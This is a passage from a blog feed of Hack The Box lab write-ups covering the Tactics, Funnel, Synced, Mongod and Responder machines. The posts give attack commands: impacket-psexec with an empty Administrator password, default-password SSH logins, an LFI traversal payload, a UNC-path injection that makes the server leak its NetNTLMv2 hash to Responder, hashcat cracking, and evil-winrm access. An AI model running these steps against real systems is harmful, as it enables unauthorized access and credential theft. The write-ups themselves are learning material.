&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fupnwhtt7t8mz83bqofvl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fupnwhtt7t8mz83bqofvl.png" alt=" " width="800" height="218"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At this point, we have:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The username of the domain administrator -&amp;gt; administrator&lt;/li&gt;
&lt;li&gt;The password of the domain administrator&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;With these credentials, we can gain a shell on the target machine as the domain administrator using &lt;strong&gt;impacket-psexec&lt;/strong&gt; and retrieve the &lt;strong&gt;root flag&lt;/strong&gt;.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fylc1sgw4xwdxy7h6yipt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fylc1sgw4xwdxy7h6yipt.png" alt=" " width="800" height="655"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Key Learning Points&lt;/p&gt;

&lt;p&gt;For me, the key learning points from this machine were:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;I learned that I can authenticate to SQL Server using a Windows domain user account via impacket-mssqlclient.&lt;/li&gt;
&lt;li&gt;I learned that WinPEAS can be used as an enumeration tool to identify potential privilege-escalation paths.&lt;/li&gt;
&lt;/ol&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Tactics</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Mon, 14 Sep 2026 21:05:39 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-tactics-1bg9</link>
      <guid>https://dev.to/zkrnvkf/htb-tactics-1bg9</guid>
      <description>&lt;p&gt;OS: Windows&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;After Nmap Enumeration&lt;br&gt;
&lt;code&gt;nmap -T4 --min-rate 5000 -p- -sC -sV -Pn 10.129.188.198&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;We get:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;└─#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;nmap &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;--min-rate&lt;/span&gt; 5000 &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-Pn&lt;/span&gt; 10.129.188.198 
&lt;span class="go"&gt;Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-14 16:11 -0400
Nmap scan report for 10.129.188.198
Host is up (0.23s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
&lt;/span&gt;&lt;span class="gp"&gt;Service Info: OS: Windows;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;CPE: cpe:/o:microsoft:windows
&lt;span class="go"&gt;
Host script results:
|_clock-skew: -26s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-09-14T20:12:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.82 seconds
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can see that port 445 is open, which indicates that the target is running the SMB (Server Message Block) protocol.&lt;/p&gt;

&lt;p&gt;One way to obtain remote shell access over SMB is by using impacket-psexec.&lt;/p&gt;

&lt;p&gt;To use impacket-psexec, we first need to install Impacket:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo apt update&lt;/code&gt;&lt;br&gt;
&lt;code&gt;sudo apt install impacket-scripts&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This package provides access to several useful Impacket tools, not just &lt;strong&gt;impacket-psexec&lt;/strong&gt;, which can be useful when attacking or interacting with Windows machines.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;impacket-psexec&lt;/strong&gt; allows us to execute commands remotely on a Windows machine over SMB. Normally, we need valid credentials, such as a username and password or an LM:NT hash, to authenticate to the target. However, for this particular machine, I decided to first test whether the Administrator account could be accessed with an empty password.&lt;/p&gt;

&lt;p&gt;Surprisingly, it worked.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6aw5t9tb39mq1ivqtjew.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6aw5t9tb39mq1ivqtjew.png" alt=" " width="800" height="456"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since HTB asked me to find the flag located on the Administrator user’s Desktop, I simply navigated to the Administrator Desktop directory and read the flag.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjpzv39z72x3cq5kfsvea.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjpzv39z72x3cq5kfsvea.png" alt=" " width="800" height="696"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Funnel</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Tue, 08 Sep 2026 22:58:23 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-funnel-4bmn</link>
      <guid>https://dev.to/zkrnvkf/htb-funnel-4bmn</guid>
      <description>&lt;p&gt;OS: Linux&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;After doing nmap enumeration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.243
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds was 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Nov 28  2022 mail_backup
&lt;/span&gt;&lt;span class="gp"&gt;22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Obtained 2 open ports for &lt;strong&gt;ftp&lt;/strong&gt; and &lt;strong&gt;ssh&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Anonymous FTP login allowed (FTP code 230)&lt;/strong&gt; -&amp;gt; This indicates that the FTP server on the target machine allows anonymous FTP login, so I thought I could try connecting to it as the anonymous user.&lt;/p&gt;

&lt;p&gt;For anonymous login credentials:&lt;br&gt;
Username: anonymous&lt;br&gt;
Password: anonymous&lt;/p&gt;

&lt;p&gt;After connecting via FTP, I found two files: 1 PDF containing the password policy and 1 welcome text file -&amp;gt; Downloaded both of them using the &lt;strong&gt;get&lt;/strong&gt; command.&lt;/p&gt;

&lt;p&gt;Within the passwordpolicy.pdf:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh5je3cjvjcaw7w4f4kip.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh5je3cjvjcaw7w4f4kip.png" alt=" " width="670" height="89"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I found that the default password for new accounts is &lt;strong&gt;funnel123#!#&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;I figured that the welcome text message would contain the names of people who had recently joined the company, and I was right:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0juhyfgp4kcos53q2fkp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0juhyfgp4kcos53q2fkp.png" alt=" " width="798" height="103"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since I knew:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;the default password&lt;/li&gt;
&lt;li&gt;the names of the newly joined people&lt;/li&gt;
&lt;li&gt;the SSH port was open&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Maybe there could be a user who had not changed their default password, so I tried to SSH into the target machine using the names and the default password. I ultimately found out that Christine had not changed her default password and was able to get an SSH connection.&lt;/p&gt;

&lt;p&gt;I used the hint from HTB to use the command &lt;code&gt;ss -tl&lt;/code&gt;, which means &lt;strong&gt;"Show me all TCP ports on this machine that are listening for incoming connections."&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fit8wuc0mje0par49b5v7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fit8wuc0mje0par49b5v7.png" alt=" " width="800" height="115"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From here, I found that there was a PostgreSQL service running locally on the target machine (127.0.0.1:5432).&lt;/p&gt;

&lt;p&gt;Since I was connected as Christine, I immediately ran the command &lt;code&gt;psql -h 127.0.0.1 -p 5432&lt;/code&gt;, but it failed because &lt;strong&gt;psql&lt;/strong&gt; was not installed. I couldn't install it manually either since it required sudo access, and I didn't know the root password.&lt;/p&gt;

&lt;p&gt;I got stuck and had to rely on the hint, where I learned about SSH tunneling and port forwarding.&lt;/p&gt;

&lt;p&gt;I learned about &lt;strong&gt;Local Port Forwarding&lt;/strong&gt;, and if I were to phrase it in my own words -&amp;gt; If I talk to port 5555 on my Kali machine while connected to the target machine, forward that traffic to port 5432 running on the target machine.&lt;/p&gt;

&lt;p&gt;The vice versa would be &lt;strong&gt;Remote Port Forwarding&lt;/strong&gt;, and we use it when the target remote machine sends traffic to its local port and we want that traffic to reach our local machine instead.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1k36cqc8ces0sazfxhbw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1k36cqc8ces0sazfxhbw.png" alt=" " width="800" height="552"&gt;&lt;/a&gt;&lt;br&gt;
&lt;code&gt;ssh -L 5555:127.0.0.1 christine@10.129.160.250&lt;/code&gt;&lt;br&gt;
So what this command is doing, the mental model would be: &lt;strong&gt;"Open a port on MY machine and forward anything arriving there through SSH to a port on the remote machine."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;To put it simply, the SSH connection is giving us a pathway for network traffic generated within our Kali machine to reach the target machine.&lt;/p&gt;

&lt;p&gt;So now we can run the following command on our Kali machine: &lt;code&gt;psql -h 127.0.0.1 -U christine -p 5555&lt;/code&gt; -&amp;gt; "i want to connect to postgresql database running in my kali machine on port 5555" but this connection network traffic actually gets forwarded to the 127.0.0.1:5432 on funnel machine instead due to pre-configured ssh tunnel"&lt;/p&gt;

&lt;p&gt;Once we get connected to the PostgreSQL database as Christine, we can navigate through the database and get the flag.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6dwdtjoalirbx4xctave.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6dwdtjoalirbx4xctave.png" alt=" " width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>linux</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Synced</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Tue, 08 Sep 2026 22:58:09 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-synced-2ieb</link>
      <guid>https://dev.to/zkrnvkf/htb-synced-2ieb</guid>
      <description>&lt;p&gt;OS: Linux&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;After nmap enumeration, we will find:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;rsync is a tool for copying and synchronizing files between machines.&lt;/p&gt;

&lt;p&gt;We can make use of &lt;strong&gt;rsync&lt;/strong&gt; command to get access to files within the exposed share/module. In this machine, there is a flag.txt within the module called public&lt;/p&gt;

&lt;p&gt;For command syntax and options available for rsync can be found in &lt;code&gt;rsync --help&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;What I did was to download the flag.txt on my own kali machine via:&lt;br&gt;
&lt;code&gt;rsync -a -v  rsync://10.129.160.164:873/public/flag.txt ./&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;and read the flag&lt;/p&gt;

&lt;p&gt;I got to learn that port 873 is commonly associated with the rsync service, and if an rsync share allows anonymous access, we may be able to enumerate and access files stored on the target server.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>linux</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Mongod</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Tue, 08 Sep 2026 22:57:57 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-mongod-4c37</link>
      <guid>https://dev.to/zkrnvkf/htb-mongod-4c37</guid>
      <description>&lt;p&gt;OS: Linux&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;After doing nmap enumeration, we will see one TCP port 27017 which refers to MongoDB&lt;/p&gt;

&lt;p&gt;Whenever we see such port open, we can try to connect to it and access the database via &lt;code&gt;mongosh&lt;/code&gt; aka MongoDB Shell&lt;/p&gt;

&lt;p&gt;You can download MongoDB Shell here:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fgj191vhognncuqf4479w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fgj191vhognncuqf4479w.png" alt=" " width="800" height="392"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Unzip it&lt;br&gt;
&lt;code&gt;dpkg-deb -x mongodb-mongosh_2.10.0_amd64.deb &amp;lt;directory that you want&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Go to the &lt;strong&gt;bin&lt;/strong&gt; folder and execute the mongo shell command&lt;br&gt;
&lt;code&gt;./mongosh mongodb://10.129.228.30:27017&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;For syntax, you can check in &lt;code&gt;mongosh --help&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Once connected, you can interact with following commands:&lt;br&gt;
&lt;code&gt;show dbs&lt;/code&gt; -&amp;gt; Show all databases&lt;br&gt;
&lt;code&gt;use &amp;lt;dbs name&amp;gt;&lt;/code&gt; -&amp;gt; Choose database&lt;br&gt;
&lt;code&gt;show collections&lt;/code&gt; -&amp;gt; Show all collections in the chosen database&lt;br&gt;
&lt;code&gt;db.&amp;lt;collection&amp;gt;.find()&lt;/code&gt; -&amp;gt; Dump the content of all the documents within the collection named&lt;/p&gt;

&lt;p&gt;to find the flag&lt;/p&gt;

&lt;p&gt;We get to learn how to identify MongoDB service as well as connecting to the database from this machine&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>database</category>
      <category>linux</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>HTB - Responder</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Tue, 08 Sep 2026 22:57:46 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-responder-5e5o</link>
      <guid>https://dev.to/zkrnvkf/htb-responder-5e5o</guid>
      <description>&lt;p&gt;OS: Windows&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;As usual, I started by enumerating the target’s open ports and services.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;nmap -p- --min-rate 1000 -sV &amp;lt;IP&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The scan revealed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;80/tcp    open    http
5985/tcp  open    wsman
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Port 80 indicated a web server, while port 5985 indicated WinRM (Windows Remote Management).&lt;/p&gt;

&lt;p&gt;While exploring the website, I noticed that the language selection changed the URL to something similar to:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;/index.php?page=french.html&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The page parameter immediately stood out because it appeared to control which file the application loaded.&lt;/p&gt;

&lt;p&gt;This led me to test whether the parameter was vulnerable to Local File Inclusion (LFI).&lt;/p&gt;

&lt;p&gt;I did not know so I had to search google and AI but a common way of testing for LFI is attempting to access a known file on the target system using directory traversal:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;../../../../../../../../windows/system32/drivers/etc/hosts&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The resulting request looked like:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The contents of the Windows hosts file were returned, confirming that the application was vulnerable to LFI.&lt;/p&gt;

&lt;p&gt;Hence, whenever I see a parameter that appears to accept a filename or path, such as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;?page=
?file=
?path=
?include=
?template=
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;because there is always a chance where there is no proper sanitization done on the parameter, which we will be able to pass malicious input and therefore view the internal system files&lt;/p&gt;

&lt;p&gt;⸻&lt;/p&gt;

&lt;p&gt;I already had two important pieces of information:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The target was a Windows machine.&lt;/li&gt;
&lt;li&gt;We had an LFI vulnerability that allowed us to control what resource the server attempted to access.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;I mean the name of the machine kind of gave it away, but I probably wouldn’t have thought of using Responder if I hadn’t learned about it through the PJPT certification course material.&lt;/p&gt;

&lt;p&gt;⸻&lt;br&gt;
The following is the section of the note I personally made while studying for PJPT exam which is very relevant to this machine:&lt;/p&gt;
&lt;h3&gt;
  
  
  Windows Assumes Every Remote Share Requires Authentication
&lt;/h3&gt;

&lt;p&gt;Windows operating systems are designed around seamless single sign-on (SSO). When you type &lt;code&gt;\\&amp;lt;IP&amp;gt;&lt;/code&gt; in the File Explorer on our Desktop / Laptop or in this challenge within the URL -&amp;gt; &lt;code&gt;http://unika.htb?page=\\&amp;lt;ip of attacker machine&amp;gt;/somefile&lt;/code&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Windows treats that IP address as a remote Windows File Server.&lt;/li&gt;
&lt;li&gt;Windows assumes, &lt;strong&gt;"To show this user their network shares, I need to introduce who is currently logged in."&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;File Explorer / victim website automatically initiates an SMB session on port 445 and sends an authentication request in the background—&lt;strong&gt;before it even checks whether the remote folder exists or allows anonymous access.&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;⸻&lt;/p&gt;
&lt;h3&gt;
  
  
  Responder Pretended to Be an SMB Server
&lt;/h3&gt;

&lt;p&gt;Your Kali machine wasn't passively sniffing traffic—&lt;strong&gt;Responder was running a fake SMB server listening on port 445&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;When the victim machine reached out to your IP asking to connect, Responder acted like a compliant SMB server:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Victim:&lt;/strong&gt; &lt;em&gt;"Hi 192.168.76.133, I want to access your shares as &lt;code&gt;MARVEL\fcastle&lt;/code&gt;."&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Responder:&lt;/strong&gt; &lt;em&gt;"Sure! Prove it's really you. Here is a random challenge code (&lt;code&gt;5fd0a679742e7eba&lt;/code&gt;). Encrypt this code with your password hash and send it back."&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Victim:&lt;/strong&gt; Encrypts the challenge using &lt;code&gt;fcastle&lt;/code&gt;'s password hash and sends the response back to Kali.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Responder took that encrypted response, logged it to your terminal as a NetNTLMv2 hash, and dropped the connection.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F782utvk96tqqmvik2o1c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F782utvk96tqqmvik2o1c.png" alt=" " width="799" height="287"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;⸻&lt;/p&gt;

&lt;p&gt;Copy the NTLMv2 Hash into a text file and use &lt;strong&gt;hashcat&lt;/strong&gt; to try cracking the password because there is a chance where a weak password has been used. There are other alternatives such as John the Ripper&lt;br&gt;
&lt;code&gt;hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;-m&lt;/code&gt; refers to mode and &lt;code&gt;5600&lt;/code&gt; corresponds to the &lt;code&gt;NTLMv2&lt;/code&gt;. For other modes we can discover them via &lt;code&gt;hashcat --help&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;hashcat will then crack the password if there is a match (you can use --show option to show the previously cracked result without having to crack again if you lost the result in the terminal)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnwaykp46gu02l9vzp34s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnwaykp46gu02l9vzp34s.png" alt=" " width="800" height="190"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But I think the actual password for this machine was &lt;strong&gt;badminton&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;⸻&lt;/p&gt;

&lt;p&gt;WinRM&lt;/p&gt;

&lt;p&gt;The original Nmap scan also showed:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;5985/tcp open wsman&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;I learned that this is the default HTTP port commonly used by Windows Remote Management (WinRM).&lt;/p&gt;

&lt;p&gt;Once we recovered valid credentials, we could use them to authenticate to WinRM.&lt;/p&gt;

&lt;p&gt;I did not know the command so I had to use AI to search up for this part. A common tool for interacting with WinRM from Linux is Evil-WinRM:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;evil-winrm -i &amp;lt;IP&amp;gt; -u administrator -p &amp;lt;password&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;In this case:&lt;/p&gt;

&lt;p&gt;evil-winrm -i  -u administrator -p badminton&lt;/p&gt;

&lt;p&gt;This provided a remote shell on the Windows machine and finally retrieve the flag&lt;/p&gt;

&lt;p&gt;⸻&lt;/p&gt;

&lt;p&gt;Looking back, the complete chain was:&lt;/p&gt;

&lt;p&gt;Nmap&lt;br&gt;
 ↓&lt;br&gt;
Discover HTTP + WinRM&lt;br&gt;
 ↓&lt;br&gt;
Enumerate website&lt;br&gt;
 ↓&lt;br&gt;
Discover name-based virtual host&lt;br&gt;
 ↓&lt;br&gt;
Discover &lt;code&gt;page&lt;/code&gt; parameter&lt;br&gt;
 ↓&lt;br&gt;
Identify LFI&lt;br&gt;
 ↓&lt;br&gt;
Understand Windows SMB authentication&lt;br&gt;
 ↓&lt;br&gt;
Use LFI to trigger SMB connection&lt;br&gt;
 ↓&lt;br&gt;
Responder captures NetNTLMv2&lt;br&gt;
 ↓&lt;br&gt;
Hashcat cracks the password&lt;br&gt;
 ↓&lt;br&gt;
Recovered Administrator credentials&lt;br&gt;
 ↓&lt;br&gt;
Connect through WinRM&lt;/p&gt;

&lt;p&gt;⸻&lt;/p&gt;

&lt;p&gt;Key Takeaways&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Don’t stop at the obvious vulnerability&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Finding LFI doesn’t necessarily mean the end goal is simply reading /etc/passwd or the Windows hosts file.&lt;/p&gt;

&lt;p&gt;Ask:&lt;/p&gt;

&lt;p&gt;What else can I make the vulnerable application access?&lt;/p&gt;

&lt;p&gt;Understanding the underlying system can reveal completely different attack paths.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pay attention to the operating system&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Knowing that the target is Windows changed the direction of the attack.&lt;/p&gt;

&lt;p&gt;Windows introduced concepts such as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;* SMB
* NTLM
* NetNTLMv2
* WinRM
* Active Directory
